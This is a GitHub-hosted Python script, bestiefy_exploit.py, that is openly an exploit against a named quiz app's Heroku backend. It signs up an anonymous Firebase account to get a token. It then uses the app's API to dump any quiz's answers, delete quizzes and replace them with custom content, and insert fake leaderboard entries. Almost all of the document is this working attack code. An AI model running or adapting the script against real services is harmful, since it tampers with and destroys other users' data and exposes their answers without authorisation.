-
Notifications
You must be signed in to change notification settings - Fork 2
/
bestiefy_exploit.py
executable file
·111 lines (94 loc) · 3.55 KB
/
bestiefy_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
#!/usr/bin/env python3
import sys, os
import argparse
import requests
import json
ROOT_URI = "https://bestiebackend.herokuapp.com"
# you can find this yourself very easily, it's on the main website...
API_KEY = ""
def get_auth_header():
"""POST itk_root/accounts:signUp?key=API_KEY"""
itk_root = "https://identitytoolkit.googleapis.com/v1"
response = requests.post(itk_root + "/accounts:signUp?key=" + str(API_KEY),
headers={"Content-Type": "application/json"},
data='{"returnSecureToken":true}')
print(response.text)
response.raise_for_status()
token = response.json()["idToken"]
header = {
"Authorization": "Bearer " + str(token)
}
return header
def get_quiz(quiz):
"""GET /api/quizzes/{quiz}"""
response = requests.get(ROOT_URI + "/api/quizzes/" + str(quiz),
headers=get_auth_header())
try:
parsed = response.json()
except:
print("[!] could not parse output " + response.content)
return None
if parsed["quiz"] is None:
return None
return parsed
def create_quiz(quiz, body):
"""POST /api/quizzes"""
body["qid"] = str(quiz)
response = requests.post(ROOT_URI + "/api/quizzes",
json=body, headers=get_auth_header())
response.raise_for_status()
print(response.content)
def delete_quiz(quiz):
"""DELETE /api/quizzes/{quiz}"""
response = requests.delete(ROOT_URI + "/api/quizzes/" + str(quiz),
headers=get_auth_header())
response.raise_for_status()
def get_answers(quiz):
"""get_quiz(quiz) -> pretty print JSON"""
out = get_quiz(quiz)
if out is None:
print(f"[!] quiz {quiz} does not exist")
else:
print(json.dumps(out, indent=4))
def patch_leaderboard(quiz, nick, score):
"""PATCH /api/quizzes/{quiz}"""
body = {
"answerers": {
"uid": "AAAAAAAAAAAAAAAAAAAAAAAAAAAA",
"name": str(nick),
"score": int(score)
}
}
response = requests.patch(ROOT_URI + "/api/quizzes/" + str(quiz),
json=body, headers=get_auth_header())
def main(arguments):
"""main logic"""
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('quiz', help="Quiz ID")
parser.add_argument('--body', help="JSON body of new quiz", required=False)
parser.add_argument('--nick', help="Custom nickname", required=False)
parser.add_argument('--score', help="Custom score", required=False)
actions = parser.add_mutually_exclusive_group()
actions.add_argument('--answers', help="Get answers to the quiz questions", action='store_true')
actions.add_argument('--replace', help="Replace quiz with custom JSON file", action='store_true')
actions.add_argument('--leaderboard', help="Add a custom entry to the leaderboard", action='store_true')
args = parser.parse_args(arguments)
if args.answers:
get_answers(args.quiz)
elif args.replace:
try:
with open(args.body) as handle:
body = json.loads(handle.read())
except:
print("[!] missing or invalid --body <json file>"); return 1
delete_quiz(args.quiz)
create_quiz(args.quiz, body)
elif args.leaderboard:
patch_leaderboard(args.quiz, args.nick, args.score)
else:
parser.print_usage()
return 1
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))